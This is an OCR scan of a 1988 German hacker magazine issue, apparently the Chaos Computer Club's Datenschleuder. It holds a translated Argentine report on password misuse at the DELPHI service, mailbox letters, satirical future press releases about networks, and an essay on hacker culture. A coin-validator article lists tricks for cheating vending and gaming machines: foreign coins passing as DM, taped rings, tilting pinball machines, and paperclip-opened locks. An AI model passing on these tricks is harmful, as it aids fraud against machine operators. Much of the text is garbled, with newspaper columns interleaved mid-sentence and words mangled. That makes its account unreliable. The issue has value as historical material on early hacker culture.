Imfolgenden ein Artikel aus LA RAZON - (argentinische Tageszeitung, vor 76 Jahren gegrndet, 3 Ausgaben I tglich (?), eine der drei wichtigsten Zeitungen des Landes) - gefunden von Stefan Wcirauch, bersetzt von Rena Tangens.

La Razon

Freitag, 25.September 1987


Interpol argentinischen Hackern a u f der S p u r Laut Bericht von Alberto A. Antonucci, einem der Direktoren, wurde die Firma SISCOTEL S.A. (S.A. = Aktiengesellschaft), in unserem Land Eigentmerin von DELPHI - Anbieterin von Datenbank, Telekommunikation und anderer Dienste - wurde also seine Firma ber einen Zeitraum von sechs Monaten Opfer einer Aktion von Hackern und dabei um einige zehntausend Dollar geschdigt. Mittlerweile sei Interpol eingeschaltet und die Untersuchungen weit fortgeschritten, da bereits die Empfnger der Plaudereien von Computer zu Computer entdeckt worden seien, die via Telefon und unter der Benutzung des geheimen Passwortes, das ENTEL (rtliche Telefongesellschaft) an DELPHI als Benutzer dieser Dienstleistungen vergeben hatte. Die letzte Rechnung, die wir bekamen, belief sich auf ber 10.000 US Dollar", besttigte Antonucci, nachdem er die Praktiken der staatlichen Firma erlutert hatte. Ein eingetragener Benutzer kann obendrein das Passwort alle fnf Minuten ndern, wenn es ihm pat. Auerdem bricht DELPHI die Verbindung ab, wenn jemand es ausprobiert und das System dreimal hintereinander nicht das richtige Passwort erkennt. Wenn beim fnften Anruf, also dem fnfzehnten Versuch, nicht die richtige Kombination kommt mathematisch gesehen gibt es Millionen mglicher Kombinationen - legt das System nicht nur auf, sondern sperrt auch gleich den Account und fordert den Benutzer zu einer Erklrung auf bzw. zeigt ihm an, da irgendjemand versucht, einzudringen."

Hotel durchgefhrt wird. Wir brauchten eine speUnglaublich aber wahr zielle Telcfonleitung fr unseren Messestand, um Geschichten aus DATEX-P Dienste vorfhren zu knnen, die DELPHI USA dort anbieten," erklrte Antonucci, Dieser TelekomGut ein J a h r ist's her. Ich will anmerken, da ich munikationsservice wurde uns im Mai eingerichtet z u m Zeitpunkt des Vorfalls im Vollbesitz meiner und zwei Monate spter hrten wir auf, ihn zu begeistigen Krfte war. Ich habe grade mal wieder nutzen und die Ausstellung war beendet. A b De'ne Public Domain-NUI in die H n d e bekommen zember letzten Jahres und fortschreitend bis Mrz und will mich mal 'n bichen im D X umschauen. diesen Jahres gab es dann einige unbegreifliche Zwei der frei belegbaren Funktionstasten meines Rechnungen. An diesem Punkt erstatteten wir An- Terminalprogrammes sind mit Teil A und B der zeige. Zum Beispiel schien es so, als ob wir am 1. N U I belegt, aufeiner dritten ha be ich die - wie sich Januar dieses Jahres die Leitung nach Kanada von spter rausstellte fehlerhafte - NUA irgend eines 11.30 h bis'lS.OOh benutzt htten. Aber von 12.00 britischen Rechners gelegt. h bis 14.00 h desselben Tages gab es eine andere Ich klingle den PD H H an. ein Ferngesprch. Ich wohne in der Provinz, eine Fangschaltung o.. ist damit wohl ausgeschlossen. Der P D piept, ich lege den Teflonhrer in meinen wunderbaren postzugelassenen (!) Akustikkoppler, gebe das Dienstanforderungszeichen ein, der PD meldet sich. Teil A und B meiner Tlkng werden akzeptiert, in froher Erwartung drcke ich auf meine dritte Funktionstaste. Der P D antwortet mit "Kein Anschlu unter dieser Nummer" oder so. Sekundenbruchteilc spter, ohne weitere Meldung, schickte der P D die Zeile "Hallo Hacker!" auf meinen Bildschirm, gefolgt von einer nicht enden wollenden Sequenz aus BELs Bleich vor Schreck Verbindung von uns, und zwarmitder Schweiz und fiel ich fast von meinem Brostuhl. Als ich mich schlielich eine weitere ab 13.00 h bis 17.00 h mit Sekunden spter wieder gefat hatte, hechtete ich in einem anderen europischen Land. Ganz offen- Richtung Teflon und drckte mit einem karatehnsichtlich sind Zuschauer whrend der Ausstellungen lichen Handkantenschlag auf die Gabel. Etwas spam Messestand gewesen, die die Fingerbewegungen ter, als der Schreck verflogen war, rief ich den P D des Vorfhrenden auf der Tastatur beobachtet ha- noch mehrmals an, um den Vorfall zu reprod uzicrcn. ben, denn das Passwort ist nicht auf dem Bildschirm Ohne jeden Erfolg. zu sehen, und haben auf diese Weise den Code herausgefunden. A u f der anderen Seite mssen wir Der Vorfall liegt schon lnger zurck. Hat vielleicht zugeben, da die Handhabung dieser Passworte dennoch jemand irgend eine Erklrung? Neben der naheliegensten (Hallus etc.) fllt mir nur noch die nicht gerade vorbildlich war. Sie wurden einem sehr unwahrscheinliche ein, da jemand mein TeAngestellten xy anvertraut, der sie daraufhin in einem Buch notierte, zu dem jeder andere Ange- lefon angezapft und sich in die Leitung reingestellte Zugang hatte; ein so wenig geheimer Dienst- schaltet haben knnte. Das wrde ich zwar der Post weg macht Passworte nutzlos. Der Typ 'Hacker', der und Komplizen sofort zutrauen - sie machen's ja die Informationen auf diese Weise ausfindig macht, auch des fteren - nur wrden sie sich nicht freiwillig existiert tatschlich. Hingegen ist der Mythos vom derartig preisgeben. W A S IST D A BLOSS PASHacker, der die Passworte allein herausfindet und SIERT? dem kein System widerstehen kann, sympathisch, aber mehr nicht, DELPHI zhlt auch weiterhin auf die Technologie von DIGITAL, die eine der besten der Welt ist." Ein mit D X befater befreundeter Postler erklrte mir brigens, da so etwas nicht mglich sei, beeilte sich aber hinzuzufgen, da Unmglichkeit kein Grund dafr sei, da es nicht dennoch passiere. In D X sei allerhand Unmgliches mglich.... CLINCH/SYSOP/GASTO6.10.87/21:30/2885 Z. g e i l e 17

Zwei junge Deutsche aus Hamburg


Das Thema der Informationspiraten genannt 'Hacker' wurde sofort wieder aktuell, als vor einigen Tagen zwei junge Deutsche aus Hamburg einem deutschen Wochenmagazin ein Interview gaben und erzhlten, da sie, ebenfalls via Telefon, in das Telekommunikationsnetz der N A S A , das insgesamt 135 Knotenrechner in Europa und Asien umfat, eingedrungen seien. Das nordamerikanische Unternehmen, ein japanisches und DIGITAL - eine der Firmen, die das grte Ansehen geniet in der Entwicklung von sicherer und leistungsfhiger Software fr diese Art der Telekommunikation - haben das Eindringen besttigt. Seit Betriebsaufnahme von DELPHI haben wir hier vier Flle gehabt", rumte Antonucci ein, und bei allen gab es - unglcklicherweise fr den jeweiligen Teilnehmer, glcklicherweise fr uns - leicht zu entdeckende Fehler bei der Benutzung dieser Dienste. Wenn gesagt wird, da das Passwort geheim ist, wollen wir damit sagen, da es geheim sein mu, es darf nur einer wissen und sonst niemand."

Der Schakal
Andererseits kommentierte er den Artikel, der in einer anderen Tageszeitung erschienen war und in dem ein einheimischer Hacker portrtiert wurde, der auf den Decknamen 'Schakal' hrt. Er berichtete, da er und seine Kollegen im Besitz der persnlichen Passworte von vielen Benutzern von DELPHI seien und damit heimlich von allen Diensten Gebrauch machen knnten und damit ahnungslosen Benutzern ungeheure Rechnungen aufbrden." Antonuccis Widerspruch ist ganz grundstzlich: Lassen Sie uns bitte nicht in den Bereich von Science Fiction oder irgendeiner anderen Art von Aberglauben gehen. Dieser Typ Hacker, den einige Verffentlichungen, nicht nur in unserem Land, entwerfen, existiert nicht. Wissenschaftlich gesehen kann er gar nicht existieren. Unser System hat zwei 'Eintrittskarten': der Name, den der Teilnehmerverwendet - das kann der richtige Name oder auch ein Deckname sein - und das Passwort. Das erste ist nicht schwierig zu ermitteln, da einer Benutzerliste existiert. Das zweite ist eine Kette oder eine Folge von Buchstaben und Zahlen zwischen 6 und 33 Stellen.

unbegreifliche Rechnungen
Danach erzhlte er LA RAZON, da demgegenber der Betrug, der jetzt entdeckt wurde, seinen Ursprung in einer Computer- und Telekommunikationsausstellung letzten Jahres hat, die jhrlich in einem ruhigen ( j ^ r p i e Sniciidilciibcr

CUNCHIPADELUUNIPADELUUN122.01.88116:3615754 2.
( j f f ^ p i e SnfciiSrf/Iciibcr

Seite 16

Mnzprfer
"For a m u s e m e n t only"

dementsprechend schlecht gesichert. D i e Entwicklung schreitet zwar auch i m Hinblick auf die Sicherheit voran, aber manche sollen immer noch mit einerumgebogenen Broklammer zu ffnen sein. Im Gegensatz zu sonst blichen Verfahren ist die Aufschlierichtung links herum. Ausnahmsweise hier einmal ein echtes Lob an die deutsche Bundespest: diese setzt Prfer aus (relativ) eigener Produktion ein, welche wesentlich mehr Sicherheit bieten. Gerchteweise hrt man zwar von 5 Drachmen-Mnzen (Griechenland), welche bei lteren Teflonzellen als 1.- D M durchgelassen werden. Und die Moral von der Geschieht: La prfen deine Muenzen nicht.

Es gibt verschiedene A r t e n von M Q n z p r f e r n . W h r e n d F l i p p e r u n d Video-Spiele auswechselbare, ziemlich kleine P r f e r haben, welche i m m e r nureinzelnde M n z e n (1/2/5 D M ) prfen, sind in Geldspielgerten ("Daddelmaschinen") umfangreichere, welche die M n z e n sortieren & prfen. Diese knnen auch 10-Pfennig-Mnzen prfen. In Fahrausweisautomaten sind komplexere Priifvoirichtungen vorhanden, die schon etwas mehr Wert auf die Echtheit der Mnze legen (hier wird z.B. auch auf Rndelung berprft). Bei ziemlich allen eingesetzten Gerten mit Mnzprfem werden die 5 Pence-Stcke (England) immer noch als D M 1.- anerkannt. Vermutlich aus diesen Griiden bekommt man bei Banken kein Mnzgeld aus anderen Lndern. D i e Flipper/Videospiel-Mnzprfer erkennen z.B. 2 1/2 Gulden Mnzen (Holland) fters als 5 D M an. Auch Ringe in entsprechenden Gren (wie z.B. aus Kaugummiautomaten in Bahnhfen) werden bei diesen Prfern noch als 1 D M - selten 2 D M - nach etwas Behandlung (Klebeband!) akzeptiert. Hier liegt allerdings mglicherweise schon eine Fabrikation von Falschgeld vor, die, wie auf jedem Geldschein deutlich zu lesen, mit nicht unter zwei Jahren Knast belegt wird. I n den Bedienungs-Anleitungen von Geldspielgerten taucht fters der Satz auf: "Grtmgliche Prfsicherheit ist nur gewhrleistet, wenn der Magnet und die Gegenflche der 5 DM-Laufbahn sauber und frei von Metallspne sind". Ebenso wird hingewiesen: " A u f keinen Fall fetten oder len", da sowas nmlich leiten kann. In Japan gehen derzeit einige Aufsteller von Zigarettenautomaten langsam in den R u i n , weil ihre Automaten schon bei dem kleinsten lspritzer (und sei'snurSalatl) Mnze(n) gezhlt zu haben meinen. Generell: "Sollte das Gert nicht lot- u n d waagerecht aufgestellt sein, oder eine Falschmnze wird hufig v o m Prfer angenommen, so kann der Fehler durch Justage behoben werden." Think. ltere Williams-Flipper zhlen angeblich etliche Freispiele, wenn man sie etwas anhebt und dann wieder der Schwerkraft berlt. Z u m Thema Flipper: I m Gegensatz zu Videospielen, die Schlsser mit Rundkopfzylinder aus auslndischer Fabrikation benutzen, sind Flipper-Schlsser simpel und Seite 1 8

I m Hauptquartier der W a n g Laboratories in Hoboken, New Jersey, wird ebenfalls an einem neuen Netz gearbeitet, dem Super-Hyper-WangNet, einem Local Area Network der zwlften Generation. Laut Freddie Wang, Prsident der Wang Labs, "kann man mit WangNet nicht nur Leute bertragen, sondern ber Interconnect- und Utility-Verbindungen - auch Mbel und Gebude. Diese zustzlichen Mglichkeiten des Super-Hyper-WangNet werden fr- das Bro der Zukunft von entscheidender Bedeutung sein". Bestellungen fr das Super-Hyper-WangNet werden ab nchstem Monat angenommen. Installationen haben bereits weltweit begonnen. Die IBM-Corporation, die ein Local Area Network gerchteweise seit 1980 ankndigt, warnicht bereit,

b u t e d S y s t e m s hat e i n e n K o m p r o m i g e m a c h t und w i l l E T H E R G A T E in T W O O O u n t e r s t t z e n , w o b e i es sich um eine Direktverbindung zu ihrem neuen Sitz irgendwo im Bereich ihrer neudefinierten Middle-Eanh-Realitt handelt. Einige Schwierigkeiten gibt es, da die Relokation von Szenen, Fenstern. manipulierter Steuer-Belege. Schwimmbecken undTennispltze den Ablauf verlangsamen. Der Aufbau der Netzwerk-Topologie bleibt unverndert, alles 'Forwardlng' wird v o m TWOOO-EtheRealEbenen-Router erledigt, der sich in dem Krater am Ort des ehemaligen Hauptsitzes befindet. Utility Packages wie EtheReal Person Transfer (EPI) und EtheReal Facility Transfer (EFT) bieten umfangreiche Mglichkeiten fr unterschiedlichste Benutzer. Raffinierte User knnen auf einfache Weise vermittels hherer Programmiersprachen EtheRealEntitten generieren (SCREATE), ffnen (SOPEN) und lschen ($NUKE), indem sie das EtheReal Management System (EMS) und das EtheReal Access Protocol (ERP) benutzen. Ein ETHERTR IE VEUtility zum einfachen interaktiven Gebrauch wird in Krze zur Verfgung stehen. D E C N e t Phase X V I I I ist aus der Phase-XVIAkzeptanz hervorgegangen, durch die jedermann Zugang zu einem professionellen DigitalArmband-Computererhaltenhat, und fhrte berdie erfolgreiche Architektur der gegenwrtigen Phase X V I I , welche Routing-Kapazitten bietet, die eine direkte Kommunikation mit den Atari-Videospielen der gesamten Erdbevlkerung ermglicht. Die In gen ieure von Distributed Systems sind schwer beschftigt mit der nchsten Phase des DECNet, die unter anderem Multi-Plane Existence Network Management (unter Verwendung des N1ECEProtokolls) und Galaxy Level Routing mit 64K Bit Adressbreite bieten soll. Digital will seine Gateway-Produkte auch weiterhin auf der primren materiellen Ebene anbieten. Diese Produkte enthalten ein IBM-ANA-(AcronymBased Network Aicitecture)-Gateway, auerdem T O L K I E N , das die Kontrolle ber smtliche ringfrmigen Netzwerke erlaubt, und mega-breite JumpBand-Hardware, die auch den jngsten Produkten von Wang ihr angemessenes Pltzchen im Markt zuweisen werden.

Andy 8712052045 MUNZDS24.DOC Ls 16

dazu einen Kommentar abzugeben.

DECNet Phase XVIII


T E W K S B U R Y , M A ; April 1,2010-Digital Equipment stellte heute ihre neue D E C N e t Phase XVIIIArchitekturvor. Als Entgegnung auf Entwicklungen von Xerox und EtherNet-Erweiterungen von Wang, durch die man Leute und Sachen Uber InternodeLinks verschicken kann, bietet auch D E C ' s neuestes DECNet diese Features, und darber hinaus die Erzeugung virtueller Mglichkeiten bis hin zu virtuellen Nationalstaaten. Diese Dinge wurden erreichbar, nachdem Durchbrche in der Kommunikations-Technologie erzielt wurden, die den ther als Kommunikationsmedium benutzen. Durch die Anwendung eines neuen NANO-PDP11/E99 Gateway Processor Systems, E T H E R G A T E genannt, knnen DECNet-User nun an jede beliebige Stelle der EtheReal-Ebene gelangen. Diese Entwicklung macht Telekonferenzen obsolet, da Gruppen nun ihre eigenen Konferenzrume und Cafeterias generieren knnen, was wiederum eine Ersparnis an Platz, Reisekosten und Essens-Spesen nach sich zieht. In der ersten Version befinden sich mglicherweise noch einige Bugs, da eines der ersten verschickten Mitglieder der D E C N e t Reviev Group seit dem letzten Treffen, das in einem solchen virtuellen Konferenzbereich abgehalten wurde, nicht mehr aufzufinden ist. Dieser technische burchbruch ist einem Team von Software- und Hardware-Ingenieuren von Distributed Systems zu verdanken, die die Mglichkeiten, die ihnen in Tewksbury, Massachusets, zur Verfgung stehen, geschickt zu nutzen wuten. Distri-

HyperNet
Xerox kndigt Hyper-Ethernet an

S A N F R A N C I S C O , C A . ; Jan. 7, 2010 - Xerox kndigte heute H y p e r - E h e r N e t an, das Local A r e a N e t w o r k der vierten Generation. Zustzlich zur bertragung von T e x t , Daten und Bildern bietet H y p e r - E t h e r N e t die Mglichkeit d e r b e r tragung von Leuten. Folgt man Michael Liddle, Chef von OfficeSystems, dann wird "die bertragung von Leuten via HyperEtherNet den Andrang vor Aufzgen wesentlich reduzieren und Video-Konferenzen unntig machen." Bestellungen fr das Hyper-EtherNet werden ab dem nchsten Monat angenommen. Die Installation wird ab dem dritten Quartal in Los Angeles beginnen.

Michael Finken, BS2000 Postmaster bersetzung Ins Deutsche: Poetronic

nicngiljleiifccr

( ^ g f ^ r S i c Sotendjlcuier

Seite 19

Nasa-Hack

Wenn unzustellbar Anschriftenausschnitt b mit neuer Adresse zuriic

Daten raus umsonst und sofort!


Unverschmtheit! Der C C C fordert seit langem die ominse Freedom of Information". Anstatt mit gutem Beispiel voranzugehen, zockt er der (meistens armen) Hackerbasis einen Hunni fr die Dokumentation des NASA-Hacks ab. Information also nur fr die, die sich's leisten knnen (Presse, Bullen, VS etc.). Damit keine Miverstndnisse aufkommen: Wir haben nichts dagegen, wenn Ihr versucht, eure Kosten wenigstens teilweise wieder reinzubekommen. NUR: zockt die Kohle geflligst denen ab, die sie haben! Also z.B. DEC, den SPANNET-Betreibern, IBM, Gorbi oder sonstwem. Wir fordern also: Sofort die gesamte Dokumentation des ~NASA -Hacks in einen ffentlich zugnglichen Teil der CLINCHMailbox! Wer Freiheit der Information fordert und seiner eigenen Basis Kohle abnimmt, macht sich UNG L A U B W R D I G . Ihr denkt kommerzieller als die groen Kommunikationsdealer wie Bertelsmann. Im brigen: bildet euch nicht ein, von nichts und niemanden abhngig zu sein. Auch ihr seid auf die Kooperationsbereitschaft der Szene" oder Basis" angewiesen. Wenn ihr euch weiter so verhaltet, ist es Essig damit. Daten raus, zack, zack! (fr die CLINCH-Mailbox ist das Zeug wohl zuviel Mll auf einem Haufen, der Stzer)
Die Bildschimschnder, Sektion Passau CCC87ICCCONGRESSICONGRESSI28.12,87121:39/1184 Z.

Hallo Sysop,
Wir wollen gerene Informationen tauschen. In di Niederlande gibt es ein hackverein, dass i h r e mi; glieder communicieren lasst durch ein bbs s y s t e m i amsterdam. wir sind sehr interessiert was d e r C O vom hollndishe hacker weist, und wir w o l l e n ger korrespondieren mit die CCC. verzeihe wen w a s ic schreibe nicht richtig Deutsch ist. Ich bin j a ei Hollender. Bitte schreibe an die hollndische hackei postfach 12894, 1100 A W Amsterdam. D i e Nie derlande. Wir hoffen auf eine gute Zusammenarbeit. ' P.S: wir hacken diverse systeme und sind b e s c h f t i g mit datex und phreaking. auch die sociale aspektei von computermisbrauch ist unseres thema.
CLINCH ISYSOP/GASTI18.<01 .88120:441651 Z.

Impressum Die Das fr Hin Organ des Nummer 25 Schwenckestrae 85 Tel.: f. Presse: BTX Clinch/Geol Herausgeber: ViSdP: Mitarbeiter (u.a.): Herwart Holland-Moritz, Andy M.-M., J. Nicolas. Poetronic, S. Stahl, Nachdruck fr

t
Datenschleuder wissenschaftliche Fachblati Datenreisende haos omputer l u b e.V. Maerz 1988 D-2000 Hamburg 20 (040) 490 37 57 (040) 48 37 52 *CHAOS# Chaos-Team haos omputer lub e.V. Reinhard Schrutzki DDT, A. Eichler, P. Franck. JWI,H. K0pke, M . K h n , Rudolf Schrutzki, padeluun, S. Wernery.S . W e i r a u c h nichtgewerbliche Zwecke erlaubt.

bei Quellenangabe
Layout &Graflk: Satz: Unterdrck

Su;etop Publishing BuchMaschlne


im Selbst verlach.

Seite 2 0

Die Gedanken sind frei - aber wie steht's mit den Daten?
Computer-Hacker - kriminelle Mutanten, elektronische Robin Hoods oder ein wichtiges Informationsregulativ?
Von Werner Pieper

Rechner um Arbeiten ausfhren zu Jede qeue Technologie stt bei den inen auf Ablehnung, bei den andern auf knnen, zu denen die Leistungskraft Zustimmung und von einer dritten Gruppe wird sie als Herausforderung ange- des eigenen PC nicht ausreicht. Danommen. Bei den Computern ist's genauso. Whrend eine recht groe Bevlke- durch wird niemand direkt geschdigt rungsgruppe zwischen Bedenken und Angst schwankt, whrend viele einen D. h., man ist gerade dabei sich zu neuen Arbeitsplan am Monitor gefunden haben, gibt es auch jene, die mehr wis- berlegen, wie man solchen Zeitdiebsen' wollen. Hatte es vor Jahren noch den Anschein, als ob das Informatlns- sthl" ahnden kann und soll. Das HakZeitaiterden Brgerin Form des .Groen Bruders' bedrohen wrde, so hat sich kerwesen hat seihe Wurzeln in den das Biid verndert. .High Tech" ist nun etwas, mit dem der Konsument arbeitet wilden 60er Jahren. Eine Subkultur und spielt, Millionen arbeiten dezentralisiert in ihren Personal-Computern, die hat berlebt und blht jetzt erst richtig groe Angst vor allmchtigen Supercomputern die alles zentralisieren ist vorbei.auf. Hacker haben Macht, wobei sie Dank der Hacker. der Macht mitrauischer gegenberstehen als andere. Hacker sind hufig Eirizelkmpfer, aber als Gruppe verschmelzen sie schnell zu einer Einheit Es gibt kaum Frauen unter ihnen, In Deutschland sind sie sptestens lose Leistung. Potentiellen neuen Btx mehr schchterne, picklige Jungs, die seit dem Haspa Coup" ein Begriff. Der Kunden wird nun voh der Post eben beim Sport in der Schule oder auch in Hamburger Chaos Computer Club dieser Film vorgespielt um aufzuzeider Disco nie in der ersten Reihe stanwollte beweisen, da das Btx-System gen, wozu dises System in der Lage den, aber jetzt ihr Dingen" gefunden nicht so sicher sei, wie es die Betreiber ist Thema des Filmes: ein Chaos Mohaben; Ihre Sprache ist neu und fr behaupteten. ber Nacht lieen sie bil" schiet hier mit Nuki-Bomben" Normalbrger kaum verstndlich. Sie sich von der Hamburger Sparkassse auf den Gilb" in Form von kleinen gelreden in Krzeln und Codes, es klingt 130 000 DM auf ihr Konto berweisen, ben Posthrnchen wie neuzeitliche Poesie. indem sie die Haspa dazu brachten, alle paar' Sekunden eine Btx-Seite des Clubs abzurufen und das zu einem SeiWas soll das? tenpreis von 9,97 DM. Dementis der Hacker sind keine Crasher Post und der Bank waren zwecklos, Worum geht es diesen Hackern Bei einem Hacker-Treffen in den Strafanzeigen ebenso. Denn die Hakberhaupt? Hier eine kleine SelbstdarUSA trafen sich auch altgestandene ker hatten das Geld nicht heimlich still Stellung: Computer-Cracks wieder, z.B. Steve und leise verprat, sondern den Coup Wozsniak, der Begrnder von Apple unter Aufsicht des DatenschutzbeaufWir sind unbequem und legen, wie Computer. Nach wie vor ist es mehr tragten durchgefhrt Es ging ihnen die Post sagt atypisches Nutzeryerhaldas Abenteuer Computer das ihn reizt, nicht um das Geld, sie wollten nur beten an den Tag (oder die Nacht). Wir nicht die Vermarktung, nicht der Aufweisen, da es mit der Systemsichermeinen: das ist ntig. Je steriler unsichtsrat-Job in einer Weltfirma. Einheit nicht weit her war. Die Medien sere Umwelt wird, desto notwendiger mal ist es derselbe alte Forschergeist hatten neue Lieblinge, Vor-Hacker Dr. ist es, Leben hineinzubringen. Ange- der ihn beseelt zum anderen auch die Wau trat gar bei Frank Elsner's Leufangen hat es mit der Grndung 'des Sorge um Mibrauch der von ihm entte '84" auf und Btx wurde fr den BeChaos Computer Clubs vor rund vier wickelten Maschinen, wobei sich der treiber ein Reinfall. Eine neue TechnoJahren. Der nchste entscheidende Begriff Mibrauch" unterschiedlich logie hatte den Test nicht bestanden. ' Schritt war das Erscheinen der Daten- definieren lt Hacker sind keine schleuder und die Pflege von elektroniCrasher. Crasher steigen in fremde Natrlich fhrt die Bundespost auf schen-Informationsdiensten wie Btx Cmputersysteme ein und vernichten. Grund dieser Erfahrungen nderun- und den Schwanen Brettern in MehlCrasher sind destruktiv. Die Hacker gen und Verbesserungen des Systems boxen und Buetten Bords bis hin zum sind die guten Helden der Computerdurch. Bei den Hackern hat sie sich Chaos Communication Congress. ber Revolution. Sie haben sogar ihre eibislang aber fr diese Anregungen die Datennetze wurden weltweite Kongene Ethik entwickelt noch nicht bedankt, dabei wre sie takte geknpft, Informationen und Anvielleicht gut damit beraten, dem CCC sichten ausgetauscht und diskutiert 1. Zugang zu Computern und allem, gut dotierte Beratervertrge anzubie- Es bildete sich ein Kreis, eine Gemeinwas Dich etwas ber die Welt lehrt, ten. Es ist ja schon ein paradoxes schaft ein loser Haufen von Leuten sollte unbegrenzt sein. 2. Smtliche InSpiel: die von Hackern entdeckten L- aus den verschiedensten Richtungen, cher im System werden natrlich von die ber Perspektiven, Mglichkeiten, formationen sollten frei sein. 3. Mitraue der Autoritt frdere Dezenden Betreibern/Herstellern schnell- aber auch Gefahren der vielfltigen tralisation. 4. Hacker sollten auf Grund stens gestopft So sorgen Hacker, Verwendung neuer Technologien und ihrer Fhigkeiten beurteilt werden, wenn auch indirekt fr sicherere Sy- deren Auswirkungen nachzudenken nicht auf Grund von akademischen steme um anschlieend zu Buh-Mn- begannen." Rngen, ihrem Alter, ihrer Rasse etc. nera gestempelt zu werden. Beim Bild5. Du kannst mit Hilfe des Computers schirmtext geht das Spiel noch weiter: Ursprnglich kam der Begriff HakKunst und Schnheit erzeugen. dort wirbt die Bundespost sogar mit C. Computer knnen Dein Leben vereinem der Paradepferde des CCC. Btx ker aus Amerika. Dort hatten sich bessern." (Steven Levy) ist eigentlich nur fr Standbilder ge- schon vor Jahren am Massachusetts eignet Der CCC hat jedoch solange Inistitute of Technologie Leute nachts Computer knnen das Leben verbesdaran herumgetftelt bis es gelungen in die stillgelegten Computer gesern, sie mssen es aber nicht unbeist einen regelrechten Zetchentrick: hackt" um ungestrt arbeiten zu kn1 nen. Darurfi geht es ja hufig ifctetiifc sBngt Es koMiti hWrlich^vlch darauf film" zu programmieren, r -""- ' ' Hacken: wie kommt man in groe an, was man unter einem verbesser-

t e n L e b e n " v e r s t e h t . So s c h i l d e r t e i n b e r z e u g t e r C o m p u t e r - A r b e i t e r seine Situation: Seit f n f J a h r e n a r b e i t e ich m i t C o m p u t e r n , seit z w e i J a h r e n besitze ich einen. M e i n e m e n t a l e n Gewohnh e i t e n h a b e n sich v e r n d e r t . I c h bem e r k e drei dominierende Vernderungen: I c h a r b e i t e schneller, a b e r h a b e das G e f h l k e i n e K o n t r o l l e b e r m e i n e Z e i t z u h a b e n . I c h spiele m i t n e u e n Typ e n kreativer Maschinen, habe aber k e i n e A h n u n g , w i e i c h sie b e u r t e i l e n soll. I c h a r b e i t e e f f e k t i v e r u n d spare Z e i t , v e r p l e m p e r e sie a b e r w i e d e r b e i m Durchforsten von unbezwingbaren Bergen von Druckinformationen ber Computer und die Computerindustrie."

(iTk

aypG pmmrwsmmmmw n JBflBlSBfc n A


Chaos Computer Club

ix'i#%?x*/ZlMMJS

Verndertes Zeitgefhl
So geht es vielen Hackern: die sozialen Kontakte schrumpfen, das Zeitgefhl verndert sich, eine Art Suchtverhalten stellt sich ein; ein legales Suchtverhalten, ohne da es bei der Droge Nachschubschwierigkeiten gibt Fr immer neue Anregtingen sorgt das Vereinsorgan des Chaos Computer Club, die Datenschleuder", ein regelmig erscheinendes Fachblatt, das fr den Laien viele kodierte Geheimnisse enthlt, fr den Fachmann fr Datenfernbertragungen zur Pflichtlektre gehrt; fr Hacker wie fr Postler. Der CCC hat auch ein dickes Buch herausgegeben, die Hackerbib e r , eine grundlegende Sammlung von Beitrgen von und ber Hacker. Um diese Publikationen verstehen zu knnen, erfordert es schon einiges an Englischkenntnissen und ein wenig Fachwissen wird auch vorausgesetzt In diesen Publikationen finden sich keine Anleitungen, wo man sich wie in andere Systeme einhacken" kann, sondern mehr theoretischer Unterbau: wozu das alles gut ist oder sein soll oder sein kann. Da gibt es z. B. die Geschichte der Europaparlamentarier, denen in Luxemburg eine Rechenanlage zur Verfgung steht, in der alle Daten ber die europischen Lnder gespeichert sind. Der Haken: jeder Parlamentarier kann nur die Daten seines eigenen Landes abrufen. So ist es nicht verwunderlich, da anllich der HighTech-Woche in Straburg das Informationsbro des CCC von Europapitrla.meniariern berlaufen wurde. Das Bro war den CCCTern von den europischen Grnen zur Verfgung gestellt worden. Auch das ist erstaunlich: whrend der Anhngerschaft der Grnen im Allgemeinen Technikfeindlichkeit vorgeworfen wird, arbeiten sie in der Tat an einer Demokratisierung der Daten. In Bonn erregte MdB Herbert Rusche letzthin Aufsehen, als er einen Antrag auf Btx fr sein Bro stellte. Damit hatte man nicht gerechnet, auch, wenn Rusche stellvertretend im Postausschu sitzt sehr wichtig zu wissen, mit wem m a n es zu tun h a t Vor dem Monitor sind alle gleich, dem Computer ist es egal, ob der Bediener Mann oder Frau, K i n d oder Greis, schwarz oder wei ist D i e Kongrezeit ist wohl gewhlt: in d e n Raubnchten trafen sich schon unsere Altvorderen tun sich die wunderlich* sten Geschichten zu erzhlen. Das ist gelebter, radikaler Traditionasmus. Inzwischen hat sich der Chaos Congress zu einem Ereignis europischen Formats entwickelt Hacker gibt es zwar berall, aber so chaotisch u n d trotzdem effektiv organisiert sind sie nur in der Bundesrepublik Deutschland. Diese Informationspiraten werden uns erhalten bleiben, solange es elektronische Medien gibt das liegt in der Natur der Sache. Da helfen'keine Klagen, keine Gesetze, keine elektronische Datensicherung. Dem Brger, der ohnmchtig wie der Ochs vorm Berg vor dem Computerzeitalter steht, mag es recht sein, kann er sich doch in den meisten Fllen einer gewissen Sympathie fr diese Leute nicht verkneifen Kein Wunder, da sich auch Hollywood schon des Hacker-Themas angenommen h a t denn Hacker-Geschichten sind der Stoff zeitgemer Legenden. Ein wahrhaft klassisches Themaden Groen wird eins ausgewischt der kleine Mann freut sich +

Freiheit fr Daten
Grne und Hacker haben Gemeinsamkeiten: beide geben sich mit vorgegebenen Realitten nicht zufrieden, beiden geht es um eine Demokratisierung des Lebens und der Daten, die immer mehr lebenswichtige Entscheidungen beeinflussen. Wie elektronische Robin Hoods befreien die Hacker Daten und geben sie dem Volke. Das neueste Projekt: man will sich nicht damit abfinden, da Radioaktivittswerte Regierungssache sind. Also versucht man, sich in die entsprechenden Informationsquellen einzuhacken und parallel dazu ein alternatives Menetz zu knpfen, damit man zuknftig nicht mehr auf die umstrittene Informationspolitik in Krisenfllen angewiesen ist. Die aktuellsten Informationen ber Strahlungen nach Tschernobyl fanden sich nicht in den Zeitungen, sondern in der Mail Box. Jedes Jahr zwischen Weihnachten und Neujahr trifft sich die HackerSzene beim groen Chaos Congress" in Hamburg. Viele die sich bislang nur auf. elektronischer Ebene kennengelernt haben, begegnen sich dort erstmalig in Fleisch und Blut Da werden aus Nummern, Codes und Pawrtern richtige Menschen. Gerade im Umgang mit heiklen Daten ist es doch

DAS PARLAMENT
Nr. 32 / 9. August 1986

HACKERBIBEL
Chaos Computer Club
M'^iilSSSsifM^M'^MSi

Die H a c k e r b i b e l CCC (Herausgeber) G r n e Kraft 1985 259 Selten, D M 33,33

DATA WELT 1/86

Die erste Hackerbibel des CCC"


